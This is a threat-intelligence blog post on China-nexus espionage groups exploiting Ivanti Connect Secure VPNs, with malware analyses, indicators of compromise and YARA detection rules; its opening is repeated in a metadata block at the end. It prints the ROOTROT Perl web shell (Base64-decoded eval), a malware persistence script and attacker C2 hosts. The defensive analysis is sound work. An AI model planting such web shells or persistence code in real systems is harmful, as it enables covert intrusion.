Mandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER implant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA. At this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments. 
UNC5330
UNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893 and CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has employed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence.
Mandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to help facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from Sept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this server on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in conjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330 has been operating through this server since at least 2021. 
UNC5337
UNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is UNC5221. 
UNC5291
UNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with UNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns with past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory warning that Volt Typhoon was targeting critical infrastructure and was potentially interested in Ivanti Connect Secure devices for initial access.
New TTPs and Malware
Since our last blog on Ivanti exploitation, Mandiant has identified additional TTPs used by threat actors to gain access to target environments and move laterally within them. Additionally, Mandiant has identified several new code families leveraged by threat actors following the exploitation of Ivanti Connect Secure appliances. Of these code families, several are assessed to be custom malware families; however, Mandiant has also identified the use of open-source tooling, such as SLIVER and CrackMapExec.
SPAWN Malware Family
During analysis of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant discovered four distinct malware families that work closely together to create a stealthy and persistent backdoor on an infected appliance. Mandiant assesses that these malware families are designed to enable long-term access and avoid detection. 
Figure 1 illustrates how the SPAWN malware family operates.







  
    
      
  

    

      
      
        
        
        
        
      
        Figure 1: SPAWN malware family diagram
      
    

  
      
    
  





SPAWNANT
SPAWNANT is an installer that leverages a coreboot installer function to establish persistence for the SPAWNMOLE tunneler and SPAWNSNAIL backdoor. It hijacks a legitimate dspkginstall installer process and exports an sprintf function adding a malicious code to it before redirecting a flow back to vsnprintf.
SPAWNMOLE
SPAWNMOLE is a tunneler that injects into the web process. It hijacks the accept function in the web process to monitor traffic and filter out malicious traffic originating from the attacker. The remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer. Mandiant assesses the attacker would most likely pass a local port where SPAWNSNAIL is operating to access the backdoor.


The malware attempts to inject itself into a process named web.


The malware attempts to hijack the accept API from the libc binary within web process.


The malware is specifically compiled as a PIE (Position Independent Executable) in order to use a third-party library for injection.


The malware traffic must start with a header that contains 0xfb49e3e2 at offset 0x13 and 0x1bc38361 at offset 0x1b of the received buffer.


SPAWNSNAIL
SPAWNSNAIL (libdsmeeting.so) is a backdoor that listens on localhost. It is designed to run by injecting into the dsmdm process (process responsible for supporting mobile device management features). It creates a backdoor by exposing a limited SSH server on localhost port 8300. We assess that the attacker uses the SPAWNMOLE tunneler to interact with SPAWNSNAIL.
SPAWNSNAIL's second purpose is to inject SPAWNSLOTH (.liblogblock.so) into dslogserver, a process supporting event logging on Connect Secure.
SPAWNSNAIL checks if its binary name is dsmdm; if it is running under that name, it creates two threads:


First thread drops a hard-coded SSH host private key to /tmp/.dskey, configures libssh to use the key, and then deletes /tmp/.dskey. The malware binds to localhost on port 8300.



The SSH server requires public key authentication.


When starting an interactive shell session, the malware prints a banner with statistics about the system. It will print the information about the release, uptime, current time, and whether SELinux is enabled. SPAWNSNAIL then executes an interactive bash shell.



The second thread injects a log tampering utility, SPAWNSLOTH (/tmp/.liblogblock.so), into the dslogserver process up to three times.


SPAWNSLOTH
SPAWNSLOTH is a log tampering utility injected into the dslogserver process. It can disable logging and disable log forwarding to an external syslog server when the SPAWNSNAIL backdoor is operating.
SPAWNSLOTH uses funchook to hook the _ZN5DSLog4File3addEPKci function (it is assumed to be a logging function of dslogserver). It also modifies the g_do_syslog_servers_exist_p symbol. This is a pointer to a global variable controlling if event logs should be forwarded to an external syslog server.
Finally, it uses interprocess communication via shared memory to communicate with the SPAWNSNAIL backdoor. SPAWNSLOTH only blocks logging when SPAWNSNAIL is running.
Getting to the Root of It
During the investigation of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant identified a new web shell we are tracking as ROOTROT. ROOTROT is a web shell written in Perl embedded into a legitimate Connect Secure .ttc file located at /data/runtime/tmp/tt/setcookie.thtml.ttc by exploiting CVE-2023-46805 and CVE-2024-21887. setcookie.thtml.ttc is located on a writable partition on the appliance, and the same file was abused in previous Pulse Connect Secure exploitation events involving CVE-2019-11539 and CVE-2020-8218.
Figure 2 shows the code inserted into the setcookie.thmtl.ttc file that contains ROOTROT. The web shell can be accessed at /dana-na/auth/setcookie.cgi. It parses the issued decoded Base64-encoded command and executes it with eval. 
   $output .=  "</body>\n\n</html>\n";
        $output .= "<!--\n";
        my $key = CGI::param('[REDACTED]');
        use MIME::Base64;
        if(defined($key)){
                my $arg=decode_base64("$key");
                eval($arg);
        }
        $output .= "-->\n";
        } };
        if ($@) {
            $error = $context->catch($@, \$output);
            die $error unless $error->type eq 'return';
        }
    
        return $output;
    },
Figure 2: Code block inserted into the setcookie.thtml.ttc file
During the investigation, Mandiant identified that the web shell was created on the system prior to the public disclosure of the associated CVEs on Jan. 10, 2024, indicating a more targeted attack. Defenders can detect the presence of ROOTROT by the existence of  <!--\n and -->\n at the end of the response from /dana-na/auth/setcookie.cgi. 
As of April 3, 2024, the latest external ICT will detect modifications to setcookie.thtml.ttc.
Lateral Movement Leading to vCenter Compromise
Once UNC5221 deployed ROOTROT on a Connect Secure appliance and established a foothold, they initiated network reconnaissance against the victim's network and moved laterally to a VMware vCenter server. Mandiant identified that UNC5221 first moved laterally using the vCenter web console, then later using SSH. 
After moving laterally to the vCenter server, UNC5221 created a new virtual machine three times in vCenter, utilizing a naming convention consistent with other servers in the environment. Though the virtual machine creation was successful, Mandiant did not identify evidence of UNC5221 successfully running or using the virtual machine.
Following this, UNC5221 accessed the vCenter appliance using SSH and downloaded the BRICKSTORM backdoor to the appliance (/home/vsphere-ui/vcli). Notably, BRICKSTORM appears to masquerade as a legitimate vCenter process, vami-http. 
BRICKSTORM
BRICKSTORM is a Go backdoor targeting VMware vCenter servers. It supports the ability to set itself up as a web server, perform file system and directory manipulation, perform file operations such as upload/download, run shell commands, and perform SOCKS relaying. BRICKSTORM communicates over WebSockets to a hard-coded C2.
Upon execution, BRICKSTORM checks for an environment variable, WRITE_LOG, to determine if the file needs to be executed as a child process. If the variable returns false or is unset, it will copy the BRICKSTORM sample from /home/vsphere-ui/vcli to /opt/vmware/sbin as vami-httpd. It will then execute the copied BRICKSTORM sample and terminate execution.
 If WRITE_LOG is set to true, it assumes it is running as the correct process, deletes /opt/vmware/sbin/vami-httpd, and continues execution.
BRICKSTORM contains a separate function called Watcher, which contains self-monitoring functionality. If the environment variable WORKER returns false or is unset, it will continue the monitoring, checking for the file /home/vsphere-ui/vcli and copying the contents over to /opt/vmware/sbin/vami-httpd. Then, it sets the appropriate environment variables and spawns the process. The watcher process then begins monitoring the exit status of the child process.
If it finds the environment variable WORKER is set to true, it assumes it is a spawned worker process meant to execute the backdoor functionality and skips the remainder of the Watcher function.
BRICKSTORM communicates with the C2 using WebSockets. This sample contains a hard-coded WebSocket address of  wss://opra1.oprawh.workers[.]dev. Additionally, it contains the following legitimate DNS over HTTPS (DoH) addresses.
https://9.9.9.9/dns-query
https://45.90.28.160/dns-query
https://45.90.30.160/dns-query
https://149.112.112.112/dns-query
https://9.9.9.11/dns-query
https://1.1.1.1/dns-query
https://1.0.0.1/dns-query
https://8.8.8.8/dns-query
https://8.8.4.4/dns-query
Figure 3: DNS over HTTPS addresses
BRICKSTORM appears to leverage a custom Go package called wssoft. There is no known, publicly available Go package with this name. It appears this may be the main package developed by the malware authors to perform task processing and connection handling for the malware.
Table 1 provides the four core functions provided by wssoft.














Function


Comments




Spawning a web server


See below for accepted routes/endpoints




Command execution


Executes shell commands using /bin/sh




Command execution (“NoContext”)


Executes shell commands using calls to os. Exec
likely accepts commands run_shell and exit




SOCKS relaying


Connection proxying














Table 1: wssoft capabilities
When the backdoor functionality is activated, it spawns a web server to handle incoming commands. It uses Gorilla/mux to handle the endpoint routing and lonnng/nex to marshal the data into JSON.
Table 2 provides the endpoints used for communications to the BRICKSTORM backdoor via POST requests.














Endpoint


Function




/api/file/change-dir


Change directory




/api/file/delete-dir


Deletes a directory




/api/file/delete-file


Deletes a file




/api/file/mkdir


Makes a directory (create subdirectories as necessary)




/api/file/list-dir


Lists directory contents




/api/file/rename


Renames a file




/api/file/put-file


File upload given a destination path, can optionally append to file




/api/file/get-file


File download




/api/file/slice-up


May upload large files in separate chunks




/api/file/file-md5


Calculates file MD5




/api/file/up


Uploads a file using a web form (includes SHA256 hashing)




/api/file/stat


Gets file information














Table 2: BRICKSTORM endpoints
Lateral Movement Leading to Active Directory Compromise
UNC5330 gained initial access to the victim environment by chaining together CVE-2024-21893 and CVE-2024-21887, a tactic outlined in Cutting Edge Part 3. Shortly after gaining access, UNC5330 leveraged an LDAP bind account configured on the compromised Ivanti Connect Secure appliance to abuse a vulnerable Windows Certificate Template, created a computer object, and requested a certificate for a domain administrator. The threat actor then impersonated the domain administrator to perform subsequent DCSyncs to extract additional credential material to move laterally.
Attack Path Diagram







  
    
      
  

    

      
      
        
        
        
        
      
        Figure 4: UNC5330 attack path diagram
      
    

  
      
    
  





Windows Certificate Template Abuse 
UNC5330 used the ldap-ivanti account, configured on the Ivanti appliance for LDAP bind operations, to create a domain computer object, testComputer$. UNC5330 used the newly created testComputer$ computer object to request a certificate from a vulnerable certificate template that provided enrollment rights to Domain Computers. UNC5330 requested a certificate for a domain administrator account, obtained a Kerberos TGT using the certificate, and performed DCSync attacks to obtain additional domain credentials for enabling lateral movement.
Once domain admin access was achieved, UNC5330 leveraged WMI to deploy the TONERJAM launcher and the PHANTOMNET backdoor.
WMI Event Consumers
WMI was used to perform lateral movement and establish persistence within the victim environment, primarily by creating and executing scheduled tasks that were subsequently removed. The ActiveScript event consumers performed the following:


Created and registered a scheduled task with trigger type 7 (started the task upon registration) to execute command with cmd.exe.


Wrote command output to a .log file in C:\Windows\Temp.


Deleted the scheduled task.


The behavior, as well as the naming convention used for both the WMI artifacts and output files, is consistent with a recent version of CrackMapExec that implements DCE/RPC for WMI execution that does not rely on SMB. Mandiant observed this technique being used to deploy TONERJAM and PHANTOMNET.
TONERJAM
TONERJAM is a launcher that decrypts and executes a shellcode payload, in this case PHANTOMNET, stored as an encrypted local file and decrypts it using an AES key derived from a SHA hash of the final 16 bytes of the encrypted payload. TONERJAM maintains persistence via the Run registry key or by hijacking COM objects depending on the permissions granted to it upon execution.
PHANTOMNET
PHANTOMNET is a modular backdoor that communicates using a custom communication protocol over TCP. PHANTOMNET's core functionality involves expanding its capabilities through a plugin management system. The downloaded plugins are mapped directly into memory and executed.
SLIVER C2
During a separate intrusion, UNC5266 retrieved copies of SLIVER from a Python SimpleHTTP server hosted on the same IP address as the configured command-and-control server. The copies of SLIVER were placed in three separate locations on the compromised appliance, attempting to masquerade as legitimate system files. UNC5266 modified a systemd service file to register one of the copies of SLIVER as a persistent daemon.














Path


Description




/home/bin/netmon


SLIVER




/home/bin/logd


SLIVER




/home/runtime/logd


SLIVER




/home/config/logd.spec.cfg


systemd service unit configuration file














Table 3: SLIVER components
Additionally, UNC5266 leveraged a WARPWIRE variant previously reported in Cutting Edge, Part 2. This variant was downloaded by UNC5266 from what Mandiant believes to be a compromised web server located in Rwanda. See Figure 18 in the Cutting Edge Part 2 blog for details on the WARPWIRE variant.
TERRIBLETEA
At a separate intrusion, UNC5266 used the same WARPWIRE sample as used in their SLIVER operation. However, instead of SLIVER, UNC5266 deployed a Go backdoor that Mandiant has named TERRIBLETEA. During this intrusion, the actor attempted to use curl to download the backdoor; however, logs suggest these attempts failed. Seven minutes after their last failed curl attempt, UNC5266 ran a wget request to an anonymous file sharing site: pan.xj.hk. UNC5266 likely uploaded TERRIBLETEA to the file-sharing site in the intervening seven minutes.
TERRIBLETEA is a Go backdoor that communicates over HTTP using XXTEA for encrypted communications. It is built using multiple open-source Go modules and has a multitude of capabilities including:


Command execution


Keystroke logging


SOCKS5 proxy


Port scanning


File system interaction


SQL query execution


Screen captures


Ability to open a new SSH session, execute commands, and upload files to a remote server. The following commands may be executed:



chmod +x /tmp/.udevd


/tmp/.udevd <args>


ls -lahrt /home/



TERRIBLETEA can take different execution paths depending on what environment it is configured for, either linux_amd64 or darwin_amd64. In this instance, TERRIBLETEA is configured for the linux_amd64 environment. The sample persists with a Bash profile script located at /etc/profile.d/cron.sh for persistence.
# Initialization script for bash and sh
# export AFS if you are in AFS environment
a=`ps -fe|grep /bin/cron |grep -v grep|wc|awk '{print$1}'`
if [ "$a" -eq 0 ] 
then
/bin/cron
fi
Figure 5: TERRIBLETEA Bash profile script
Outlook and Implications
The activity detailed in this blog, as well as the recently published Cutting Edge, Part 3 highlighting UNC5325 targeting of Ivanti Connect Secure appliances, underscore the threat faced by edge appliances. Mandiant continues to observe China-nexus threat actors aggressively utilizing zero-day and N-day vulnerabilities to enable their operations and target organizations across the globe. 
Mandiant continues to observe a wide range of TTPs following the successful exploitation of vulnerabilities against edge appliances. As previously reported by Mandiant, China-nexus actors continue to evolve their stealth to avoid detection by defenders. While the use of open--source tooling is somewhat common, Mandiant continues to observe actors leveraging custom malware that is tailored to the appliance or environment the actor is targeting.
Indicators of Compromise (IOCs)
Host-Based Indicators (HBIs)













Filename


MD5


Description






data.dat


9d684815bc96508b99e6302e253bc292


PHANTOMNET




epdevmgr.dll


b210a9a9f3587894e5a0f225b3a6519f


TONERJAM




libdsproxy.so


4f79c70cce4207d0ad57a339a9c7f43c


SPAWNMOLE




libdsmeeting.so


e7d24813535f74187db31d4114f607a1


SPAWNSNAIL




.liblogblock.so


4acfc5df7f24c2354384f7449280d9e0 


SPAWNSLOTH




.dskey


3ef30bc3a7e4f5251d8c6e1d3825612d


SPAWNSNAIL private key




N/A


bb3b286f88728060c80ea65993576ef8


TERRIBLETEA




N/A


cfca610934b271c26437c4ce891bad00


TERRIBLETEA




N/A


08a817e0ae51a7b4a44bc6717143f9c2


TERRIBLETEA




linb64.png


e7fdbed34f99c05bb5861910ca4cc994


SLIVER




lint64.png


c251afe252744116219f885980f2caea


SLIVER




linb64.png


4f68862d3170abd510acd5c500e43548


SLIVER




lint64.png


9d0b6276cbc4c8b63c269e1ddc145008


SLIVER




logd


71b4368ef2d91d49820c5b91f33179cb


SLIVER




winb64.png


d88bbed726d79124535e8f4d7de5592e


SLIVER




logd.spec.cfg


846369b3a3d4536008a6e1b92ed09549


SLIVER persistence




N/A


8e429d919e7585de33ea9d7bb29bc86b


SLIVER downloader




N/A


fc1a8f73010f401d6e95a42889f99028


PHANTOMNET




N/A


e72efc0753e6386fbca0a500836a566e


PHANTOMNET




N/A


4645f2f6800bc654d5fa812237896b00


BRICKSTORM













Table 4: Host-based indicators
Network-Based Indicators (NBIs)













Network Indicator


Type


Description






8.218.240[.]85


IPv4


Post-exploitation activity




98.142.138[.]21


IPv4


Post-exploitation activity




103.13.28[.]40


IPv4


Post-exploitation activity




103.27.110[.]83


IPv4


Post-exploitation activity




103.73.66[.]37


IPv4


Post-exploitation activity




193.149.129[.]191


IPv4


Post-exploitation activity




206.188.196[.]199


IPv4


Post-exploitation activity




oast[.]fun


Domain


Pre-exploitation validation




cpanel.netbar[.]org


Domain


WARPWIRE Variant C2 server




pan.xj[.]hk


Domain


Post-exploitation activity




akapush.us[.]to


Domain


SLIVER C2 server




opra1.oprawh.workers.dev


Domain


BRICKSTORM C2 server













Table 5: Network-based indicators
YARA Rules
rule M_Hunting_Webshell_ROOTROT_1 {
  meta:
    author = "Mandiant"
    description = "This rule detects ROOTROT, a web shell written in 
Perl that is embedded into a legitimate Pulse Secure .ttc file to 
enable arbitrary command execution."
    md5 = "c7ffd2c06e9b7e8e0b7ac92a0dbe3294"
  strings:
    $s1 = "use MIME::Base64" ascii
    $s2 = {6d 79 20 24 61 72 67 3d 64 65 63 6f 64 65 5f 62 61 73 
65 36 34 28 22 24 6b 65 79 22 29}
    $s3 = {24 6f 75 74 70 75 74 20 2e 3d 20 22 3c 21 2d 2d 5c 6e 
22 3b}
    $s4 = {22 3c 2f 62 6f 64 79 3e 5c 6e 5c 6e 3c 2f 68 74 6d 6c 3e 
5c 6e 22}
  condition:
    filesize < 4KB
    and all of them
}

rule M_Hunting_Backdoor_BRICKSTORM_1 {
  meta:
    author = "Mandiant"
    created = "2024-01-30"
    md5 = "4645f2f6800bc654d5fa812237896b00"
    descr = "Hunting rule looking for BRICKSTORM golang backdoor samples"
  strings:
    $v1 = "/home/vsphere-ui/vcli" ascii wide
    $v2 = "/opt/vmware/sbin" ascii wide
    $v3 = "/opt/vmware/sbin/vami-httpd" ascii wide
    $s1 = "github.com/gorilla/mux" ascii wide
    $s2 = "WRITE_LOG=true" ascii wide
    $s3 = "wssoft" ascii wide
    
  condition:
    uint32(0) == 0x464c457f and filesize < 6MB and 1 of ($v*) and 2 of ($s*)
}
import "pe"
rule M_APT_Backdoor_Win_PHANTOMNET_1
{
    meta:
        author = "Mandiant"
        md5 = "59f4d38a5caafbc94673c6d488bf37e3"

    strings:
        $phantomnet = /\\PhantomNet-\w{1,10}\.pdb/ ascii nocase
    condition:
        (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550) 
and all of them
}

rule M_APT_Backdoor_SLIVER_1
{
    meta:
        Author = “Mandiant”
        description = "Detects Windows, MacOS and ELF variants 
of the Sliver implant framework"
        md5 = "5ecd0c38501dfb02b682cec0a2d93aa9"

    strings:
        $s1 = ".InvokeSpawnDllReq"
        $s2 = ".(*InvokeSpawnDllReq).Reset"
        $s3 = ".(*InvokeSpawnDllReq).ProtoMessage"
        $s4 = ".(*InvokeSpawnDllReq).ProtoReflect"
        $s5 = ".(*InvokeSpawnDllReq).Descriptor"
        $s6 = ".(*InvokeSpawnDllReq).GetData"
        $s7 = ".(*InvokeSpawnDllReq).GetProcessName"
        $s8 = ".(*InvokeSpawnDllReq).GetArgs"
        $s10 = ".(*InvokeSpawnDllReq).GetKill"
        $s11 = ".(*InvokeSpawnDllReq).GetPPid"
        $s12 = ".(*InvokeSpawnDllReq).GetProcessArgs"
        $s13 = ".(*InvokeSpawnDllReq).GetRequest"
        $s14 = ".(*InvokeSpawnDllReq).String"
        $s15 = ".(*InvokeSpawnDllReq).GetEntryPoint"

    condition:
        ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) 
or uint32(0) == 0x464c457f or (uint32(0) == 0xBEBAFECA or uint32(0) 
== 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xCEFAEDFE)) 
and 5 of ($s*)
}

rule M_APT_Backdoor_TERRIBLETEA_1 {
    meta:
        author = "Mandiant"
        description = "This rule is designed to detect on events related 
to terribletea. TERRIBLETEA is a backdoor written in Go that communicates 
over HTTP. Its many capabilities include shell command execution, 
capturing screens, keystroke logging, port scanning, enumerating files, 
starting a SOCKS5 proxy and new SSH session, downloading files, and 
executing SQL queries."
        md5 = "bb3b286f88728060c80ea65993576ef8"
    
    strings:
        $code_part_of_getcommand = {48 BA 44 61 74 61 31 73 33 6E 
[1-12] 80 7B ?? 64}
        $code_get_task = { 48 8D  [5] B9 04 00 00 00 48 8B ?? 24 [4] 48 
8D [5] 41 B8 03 00 00 00 E8}
        $func1 = "SendRequest" fullword
        $func2 ="UploadResult"
        $func3 ="Online"
        $func4 ="GetCommond"
    condition:
        all of ($code*) and any of ($func*) and filesize<20MB  
}

rule M_Launcher_TONERJAM_1
{
    meta:
        author = "Mandiant"
        description = "This rule detects TONERJAM, a launcher that 
decrypts and executes a shellcode payload stored as an encrypted 
local file and decrypts it using an AES key derived from a SHA hash 
of the final 16 bytes of the encrypted payload."

    strings:
        $p00_0 = {e9[4]488b41??668338??75??4883c0??488941??b8[4]eb??b8}
        $p00_1 = {8030??488d40??41ffc14183f9??72??ba[4]488d4c24??e8[4]488d0d}

    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
        (
            ($p00_0 in (17000..28000) and $p00_1 in (3700..14000))
        )
}

rule M_APT_Installer_SPAWNSNAIL_1
{ 
    meta: 
        author = "Mandiant" 
        description = "Detects SPAWNSNAIL. SPAWNSNAIL is an SSH 
backdoor targeting Ivanti devices. It has an ability to inject a specified 
binary to other process, running local SSH backdoor when injected to 
dsmdm process, as well as injecting additional malware to dslogserver" 
        md5 = "e7d24813535f74187db31d4114f607a1"
  
    strings: 
        $priv = "PRIVATE KEY-----" ascii fullword
        
        $key1 = "%d/id_ed25519" ascii fullword
        $key2 = "%d/id_ecdsa" ascii fullword
        $key3 = "%d/id_rsa" ascii fullword
        
        $sl1 = "[selinux] enforce" ascii fullword
        $sl2 = "DSVersion::getReleaseStr()" ascii fullword
        
        $ssh1 = "ssh_set_server_callbacks" ascii fullword
        $ssh2 = "ssh_handle_key_exchange" ascii fullword
        $ssh3 = "ssh_add_set_channel_callbacks" ascii fullword
        $ssh4 = "ssh_channel_close" ascii fullword
    
    condition: 
        uint32(0) == 0x464c457f and $priv and any of ($key*) 
and any of ($sl*) and any of ($ssh*)
} 
rule M_APT_Installer_SPAWNANT_1
{ 
    meta: 
        author = "Mandiant" 
        description = "Detects SPAWNANT. SPAWNANT is an 
Installer targeting Ivanti devices. Its purpose is to persistently 
install other malware from the SPAWN family (SPAWNSNAIL, 
SPAWNMOLE) as well as drop additional webshells on the box." 
  
    strings: 
        $s1 = "dspkginstall" ascii fullword
        $s2 = "vsnprintf" ascii fullword
        $s3 = "bom_files" ascii fullword
        $s4 = "do-install" ascii
        $s5 = "ld.so.preload" ascii
        $s6 = "LD_PRELOAD" ascii
        $s7 = "scanner.py" ascii
        
    condition: 
        uint32(0) == 0x464c457f and 5 of ($s*)
}

rule M_APT_Tunneler_SPAWNMOLE_1
{ 
    meta: 
        author = "Mandiant" 
        description = "Detects a specific comparisons in SPAWNMOLE 
tunneler, which allow malware to filter put its own traffic . 
SPAWNMOLE is a tunneler written in C and compiled as an ELF32 
executable. The sample is capable of hijacking a process on the 
compromised system with a specific name and hooking into its 
communication capabilities in order to create a proxy server for 
tunneling traffic." 
        md5 = "4f79c70cce4207d0ad57a339a9c7f43c"
  
    strings: 
        /*
        3C 16                                cmp     al, 16h
        74 14                                jz      short loc_5655C038
        0F B6 45 C1                          movzx   eax, [ebp+var_3F]
        3C 03                                cmp     al, 3
        74 0C                                jz      short loc_5655C038
        0F B6 45 C5                          movzx   eax, [ebp+var_3B]
        3C 01                                cmp     al, 1
        0F 85 ED 00 00 00                    jnz     loc_5655C125
        */


        $comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2] 
3C 01 0F 85 }

        /*
        81 7D E8 E2 E3 49 FB                 cmp     [ebp+var_18], 0FB49E3E2h
        0F 85 CD 00 00 00                    jnz     loc_5655C128
        81 7D E4 61 83 C3 1B                 cmp     [ebp+var_1C], 1BC38361h
        0F 85 C0 00 00 00                    jnz     loc_5655C128
        */

        $comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3 
1B 0F 85}
        
  
    condition: 
        uint32(0) == 0x464c457f and all of them
}

rule M_APT_Utility_SPAWNSLOTH_1
{ 
    meta: 
        author = "Mandiant" 
        description = "Detects SPAWNSLOTH. SPAWNSLOTH 
is an Utility targeting Ivanti devices. Its purpose is to work 
together with SPAWNSNAIL and block logging via dslogserver 
process when SPAWNSNAIL backdoor is active." 
        md5 = "4acfc5df7f24c2354384f7449280d9e0"
  
    strings: 
        $dslog = "dslogserver" ascii fullword

        $hook1 = "g_do_syslog_servers_exist" ascii fullword
        $hook2 = "_ZN5DSLog4File3addEPKci" ascii fullword
        $hook3 = "funchook_create" ascii fullword
    
    condition: 
        uint32(0) == 0x464c457f and all of them
}


Author: Mandiant 
PublishedDate: 2024-04-04
Category: Technology
NewsPaper: Google Cloud Blog
Tags: Threat Intelligence
{"id"=>6028,
"title"=>"Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies",
"summary"=>"

Written by: Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph Pisano, Ryan Hall, Ron Craft, Shawn Chew, Billy Wong, Tyler McLellan

\n
\n

 

\n

Since the initial disclosure of CVE-2023-46805 and CVE-2024-21887 on Jan. 10, 2024, Mandiant has conducted multiple incident response engagements across a range of industry verticals and geographic regions. Mandiant's previous blog post, Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts, details zero-day exploitation of CVE-2024-21893 and CVE-2024-21887 by a suspected China-nexus espionage actor that Mandiant tracks as UNC5325. 

\n

This blog post, as well as our previous reports detailing Ivanti exploitation, help to underscore the different types of activity that Mandiant has observed on vulnerable Ivanti Connect Secure appliances that were unpatched or did not have the appropriate mitigation applied. 

\n

Mandiant has observed different types of post-exploitation activity across our incident response engagements, including lateral movement supported by the deployment of open-source tooling and custom malware families. In addition, we've seen these suspected China-nexus actors evolve their understanding of Ivanti Connect Secure by abusing appliance-specific functionality to achieve their objectives.

\n

As of April 3, 2024, a patch is readily available for every supported version of Ivanti Connect Secure affected by the vulnerabilities. We recommend that customers follow Ivanti's latest patching guidance and instructions to prevent further exploitation activity. In addition, Ivanti released a new enhanced external integrity checker tool (ICT) to detect potential attempts of malware persistence across factory resets and system upgrades and other tactics, techniques, and procedures (TTPs) observed in the wild. We also released a remediation and hardening guide, which includes recommendations.

\n

Mandiant recommends customers run both the internal and the latest external ICT released alongside a new patch on April 3, 2024, as part of a comprehensive defense-in-depth strategy. Mandiant would like to acknowledge Ivanti for their collaboration, transparency, and ongoing support throughout this process.

\n

Clustering and Attribution

\n

Mandiant is tracking multiple clusters of activity exploiting CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893 across our incident response investigations. In addition to suspected China-nexus espionage groups, Mandiant has also identified financially motivated actors exploiting CVE-2023-46805 and CVE-2024-21887, likely to enable operations such as crypto-mining. Since the public disclosure on Jan. 10, 2024, Mandiant has observed eight distinct clusters involved in the exploitation of one or more of these Ivanti CVEs. Of these, we are highlighting five China-nexus clusters that have conducted intrusions. 

\n

In February 2024, Mandiant identified a cluster of activity tracked as UNC5291, which we assess with medium confidence to be Volt Typhoon, targeting U.S. energy and defense sectors. The UNC5291 campaign targeted Citrix Netscaler ADC in December 2023 and probed Ivanti Connect Secure appliances in mid-January 2024, however Mandiant has not directly observed Volt Typhoon successfully compromise Ivanti Connect Secure.

\n

UNC5221

\n

UNC5221 is a suspected China-nexus actor that Mandiant is tracking as the only group exploiting CVE-2023-46805 and CVE-2024-21887 during the pre-disclosure time frame since early Dec. 2023. As stated in our previous blog post, UNC5221 also conducted widespread exploitation of CVE-2023-46805 and CVE-2024-21887 following the public disclosure on Jan. 10, 2024.

\n

UNC5266

\n

Mandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER implant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA. At this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments. 

\n

UNC5330

\n

UNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893 and CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has employed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence.

\n

Mandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to help facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from Sept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this server on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in conjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330 has been operating through this server since at least 2021. 

\n

UNC5337

\n

